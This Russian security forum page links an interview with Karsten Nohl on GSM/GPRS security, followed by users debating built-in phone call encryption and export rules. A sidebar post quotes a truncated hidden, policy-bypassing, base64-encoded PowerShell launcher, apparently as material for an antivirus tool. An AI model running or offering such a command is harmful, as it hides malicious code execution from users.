Перейти к содержанию
AM_Bot

Интервью с Карстеном Нолем, исследователем безопасности мобильных коммуникаций

Recommended Posts

AM_Bot

KarstenNohl.pngНемецкий аналитик и специалист по защите информации Карстен Ноль, работающий в берлинской компании Security Research Labs, в последнее время активно занимается вопросами безопасности мобильной связи. Так, ему уже доводилось вскрывать защиту стандарта GSM, а на этой неделе он и его коллеги представили результаты нового исследования, демонстрирующего относительную простоту компрометации GPRS. Журналист Forbes Энди Гринберг провел с г-ном Нолем беседу об актуальных проблемах обороны подвижной радиосвязи.

Читать далее

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Viktor

Имхо - заказуха, по ходу интервью обсуждают GPRS, а в итоге все сводят к шифрованию звонков и рекламе Whisper Systems

А что вы можете сказать о программах шифрования для Android вроде тех, что выпускает Whisper Systems?

Недорогая альтернатива. Это чисто программное решение, но для нужд большинства пользователей его возможности будут достаточны. Такие приложения обеспечивают тот самый дополнительный уровень шифрования, а большего вам как индивидуальному пользователю и не требуется.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин
Имхо - заказуха, по ходу интервью обсуждают GPRS, а в итоге все сводят к шифрованию звонков и рекламе Whisper Systems

Если и так, то очень грамотная. У меня на середине интервью возник как раз такой вопрос, как шифровать? А в конце на него отвечают и даже есть наводка.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Viktor
Если и так, то очень грамотная. У меня на середине интервью возник как раз такой вопрос, как шифровать? А в конце на него отвечают и даже есть наводка.

Угу, только сначала говорили про Фому, а вывод сделали про Ерему...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Между прочим интересная тема поднята. Почему до сих пор никто из производителей трубок не реализовал механизм шифрования по требованию?

На поверхности что может быть проще? В начале звонка проверяется поддерживается ли данный метод шифрования трафика у собеседника, если да - автоматов включается шифрование.

Представляю что бы на такой "беспредел" сказало наше ФСБ, легли бы костьми, но не допустили продаж в рашке :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.
Между прочим интересная тема поднята. Почему до сих пор никто из производителей трубок не реализовал механизм шифрования по требованию?

На поверхности что может быть проще? В начале звонка проверяется поддерживается ли данный метод шифрования трафика у собеседника, если да - автоматов включается шифрование.

Это тогда должен быть какой-то единый алгоритм шифрования у всех, не так ли ?

Причем с учетом всех существующих национальных ограничений на экспорт криптоалго и их использование.

В общем - нереально. Кому надо - сам себе сделает, программно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Viktor
Причем с учетом всех существующих национальных ограничений на экспорт криптоалго и их использование.

Имхо, это ключевая причина

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Виталий Я.
Имхо, это ключевая причина

Дык обозревали недавно в паблике возможности криптосоединения. Роскошь все-таки.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин
Причем с учетом всех существующих национальных ограничений на экспорт криптоалго и их использование.

В общем - нереально. Кому надо - сам себе сделает, программно.

Давайте конкретно говорить. Берем AES 128, который принят в качестве стандарта шифрования правительством США. Где его нельзя будет использовать? 1. в России 2. Китай? 3.?

В США и западной Европе с этим проблем не будет. Разве это не достаточный рынок, для внедрения опциональной возможности шифрования?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.
Давайте конкретно говорить. Берем AES 128, который принят в качестве стандарта шифрования правительством США. Где его нельзя будет использовать? 1. в России 2. Китай? 3.?

Начни с того, где эти телефоны делаются :) И все остальное отпадет само.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×